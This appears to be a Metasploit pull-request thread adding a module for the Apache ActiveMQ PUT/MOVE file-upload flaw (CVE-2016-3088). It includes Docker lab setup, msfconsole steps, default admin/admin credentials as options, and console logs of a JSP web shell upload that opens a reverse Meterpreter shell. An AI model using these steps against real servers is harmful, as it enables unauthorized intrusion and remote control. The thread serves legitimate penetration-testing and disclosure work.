Added module to exploit ActiveMQ; CVE-2016-3088

[imander]

Description

This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. By default, a JSP web shell and Java Meterpreter payload are uploaded to the '/fileserver/' path of a vulnerable server, then moved via an HTTP MOVE request to either '/api/' or '/admin/'.

Vulnerable Application

Apache ActiveMQ is a popular open source message broker and integration patterns server which implements Java Message Service (JMS) 1.1.

Source and Installers

• Source
• Installers

Testing with Docker

The easiest way to quickly spin up an ActiveMQ server to test with Metasploit is to install Docker, then pull and launch a vulnerable ActiveMQ image from the Docker Hub. For example:

# Pull ActiveMQ 5.11.0 from the Hub
docker pull rmohr/activemq:5.11.0
# Launch the container with webserver running on port 8161
docker run -p 61616:61616 -p 8161:8161 rmohr/activemq:5.11.0

Verification Steps

1. Start msfconsole
2. Do: use exploit/multi/http/apache_activemq_upload_jsp
3. Do: set rhost [IP]
4. Do: run
5. You should get a session

Basic Options

AutoCleanup
Remove web shells from the target system after callback is received (Default: true)

BasicAuthUser
User-supplied username (Default: admin)

BasicAuthPass
User-supplied password associated with username (Default: admin)

JSP
Desired name to assign to the JSP web shell when it is uploaded to the target system. Do not include the .jsp extension (Default: randomly-generated string)

Advanced Options

UploadPath
Custom path into which web shells will be uploaded on the target system. If the user determines that a nonstandard directory is able to execute .jsp files, user can specify this directory for exploitation (Default: attempt /api/; if that fails, attempt /admin/)

[brandonprry]

This works for me.

msf > use exploit/multi/http/apache_activemq_upload_jsp 
msf exploit(apache_activemq_upload_jsp) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(apache_activemq_upload_jsp) > exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Uploading http://192.168.56.102:8161/opt/activemq/webapps/api/thboHOqElR.jar
[*] Uploading http://192.168.56.102:8161/opt/activemq/webapps/api/thboHOqElR.jsp
[*] Sending stage (49667 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:32816) at 2017-06-24 12:25:49 -0500
[+] Deleted /opt/activemq/webapps/api/thboHOqElR.jar
[+] Deleted /opt/activemq/webapps/api/thboHOqElR.jsp

meterpreter > getuid
Server username: activemq
meterpreter > 

[wvu]

This module is basically flawless, @imander. Good work.

One thing to note is that the file upload is actually pre-auth, but to get the install path, you need to obtain it some other way. Good call hitting /admin/test/systemProperties.jsp.

That was the missing puzzle piece when I tested this vuln last year, since I was trying for an exclusively pre-auth exploit.

[wvu]

msf exploit(apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Uploading http://192.168.33.129:8161/home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jar
[*] Uploading http://192.168.33.129:8161/home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jsp
[*] Sending stage (50783 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49550) at 2017-06-28 15:02:13 -0500
[+] Deleted /home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jar
[+] Deleted /home/[redacted]/apache-activemq-5.9.1/webapps/api/YcCnMUPPV.jsp

meterpreter > 

[wvu]

Release Notes

The exploits/multi/http/apache_activemq_upload_jsp module has been added to the framework. This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 that allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.